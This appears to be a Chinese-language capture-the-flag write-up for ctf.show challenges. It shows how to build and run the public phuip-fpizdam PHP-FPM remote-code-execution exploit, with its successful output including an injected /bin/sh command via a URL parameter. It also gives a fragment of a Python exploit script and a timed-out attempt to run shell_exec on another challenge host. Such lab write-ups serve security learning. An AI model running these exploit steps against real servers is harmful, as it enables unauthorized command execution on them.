git clone https://github.com/neex/phuip-fpizdam.git cd phuip-fpizdam go get -v && go build
执行go get -v && go build会一直没反应 因为go proxy默认为proxy.golang.org,国内无法访问 执行命令换代理:go env -w GOPROXY=https://goproxy.cn 再次执行go get -v && go build 最后使用:
1
go run . "地址/index.php"
末尾的index.php必须要加。 我再本地搭的用不了,拿vps打了一下就能用了。
1 2 3 4 5 6 7 8 9 10 11
root@hcss-ecs-8320:~/phui/phuip-fpizdam# go run . "http://24f960ac-d8d8-45be-8ba0-f5bb12ba5cb1.challenge.ctf.show/index.php" 2023/09/1720:37:46 Base status code is 200 2023/09/1720:37:49 Status code 502for qsl=1765, adding as a candidate 2023/09/1720:37:50 The target is probably vulnerable. Possible QSLs: [175517601765] 2023/09/1720:38:10 Attack params found: --qsl 1760 --pisos 237 --skip-detect 2023/09/1720:38:10 Trying to set "session.auto_start=0"... 2023/09/1720:38:12Detect() returned attack params: --qsl 1760 --pisos 237 --skip-detect <-- REMEMBER THIS 2023/09/1720:38:12 Performing attack using php.ini settings... 2023/09/1720:38:14 Success! Was able to execute a command by appending "?a=/bin/sh+-c+'which+which'&" to URLs 2023/09/1720:38:14 Trying to cleanup /tmp/a... 2023/09/1720:38:14 Done!
data = recv_xml(conn) print('[+] Recieve data: ' + data.decode()) g = re.search(rb'<\!\[CDATA\[([a-z0-9=\./\+]+)\]\]>', data, re.I) if not g: print('[-] No result...') sys.exit(0)
data = g.group(1)
try: print('[+] Result: ' + base64.b64decode(data).decode()) except binascii.Error: print('[-] May be not string result...')
部署一下尝试
1 2 3 4 5 6 7 8
root@hcss-ecs-8320:~/test# python3 exp.py -t http://pwn.challenge.ctf.show:28100/ -c 'shell_exec("ls /");' Traceback (most recent call last): File "/root/test/exp.py", line 65, in <module> conn, addr = sk.accept() File "/usr/lib/python3.10/socket.py", line 293, in accept fd, addr = self._accept() TimeoutError: timed out